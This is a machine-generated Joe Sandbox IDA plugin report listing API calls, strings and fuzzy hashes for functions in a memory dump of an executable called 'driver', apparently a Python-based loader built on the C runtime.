                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction ID: 069820f5a8b75d1a2d4c780924124f5d940fe3188c43fd58548f20eb99e46ba7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4401D621B4974145EA04DF53990117AA691BF85FE8F084631EE5C97FD7DEBCF111A300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                • Instruction ID: f38ba09ba284a4001f2a6becd97e30f0fe5aecad3c7de0874d1b3c94f7f534ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD018020E8F24348FAA46B23A5812B951A8AF04FDCF544635FA5DC27C7DFFCB441A201
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                • Instruction ID: 4870598409feb9e385c44b56a1b0a7e7f3a4c5167f7ebecf35961490dec21240
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0C2A0F8A6078EF7553AB748C61B92020AF45F88F405430ED08C62C7DEAC7C58B222
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6A29CB39A,?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA), ref: 00007FF6A29CEC5D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                • Instruction ID: 6bf94e5cc2c96123860a8b9f4cc1e3db2b0ca14673da563c4a2a9294f805c997
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF06D44BCB30649FE5A5B6399622B552845F98F88F4C5430CD4FCA3D3DE9CF490A210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6A29C0D00,?,?,?,00007FF6A29C236A,?,?,?,?,?,00007FF6A29C3B59), ref: 00007FF6A29CD6AA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction ID: 8ab37ece2347d4b0b77f19b99d37de510f9f04e0c0dd54ef45faa92d2e629520
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F05800B8B74659FE647B635A112B952904F94FA8F081230DC2EC63C3DEACF4A0F620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5830
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5842
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5879
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B588B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58B6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58CF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58E1
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58FD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B590F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B592B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B593D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5959
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B596B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5987
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5999
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59B5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59C7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction ID: 1a4a8b8ae3738dd822fd62e5b595c0371242586de205768acc21d5c28d3092ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F229F24ACBB4791FA549B57E8241B423E1BF08F9DF845139D81E82667FFFCA548B240
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                • Instruction ID: 6322075f8956265f1e934496d328a510968f51bd2d7efc8dece4a333e16640ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFB2E772A592828BE7248E66D5407FD37E1FB54B8CF406135DE0D97A86DFBCA900EB40
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                                                • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                • Instruction ID: ad71ebbf7d81f588d31c0c74a26175563730e562211960cadb02f5afc1033226
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53521872A156A68BD7988F16C458BBD3BAAFB44744F014139EA4AC37C2DFBCD844DB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction ID: 0e530bf6ec4a31556f756fb59efd52d43437f2bc56a48447978c2b5b462c6272
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9319672609B8185EB608F61E8503EE33A1FB94B48F044039DB4D87B9ADF7CC548D710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5CB5
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA979
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA99E
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5CA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F1A
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F2B
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F3C
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                                • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                • Instruction ID: c1092af912ab9c195aa3b9abc9fd48a7821443738fc25ae78f96f1c787582ad8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BD1C126A4A24246FB24AF37D4811B96791EF84F9CF808136EA4DC7697DFBCE441B740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction ID: 5bc0d29506105087d2c8a1f49be6f8983aebef5fb94696d37093237eca1eef7f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0319632649B8185E724CF25E8503EE73A0FB98B58F540135EA8D87B56DF7CD145D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                • Instruction ID: 91e68470de462d66c865fd2ba66edf8e9a75287a0fcb9acb5776d5c6d4e0bee3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B1B423B5A68245EB649B67E5001B963D1EB44FE8F444136EA5D87BCAEFBCE441F300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F1A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F2B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F3C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D564C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
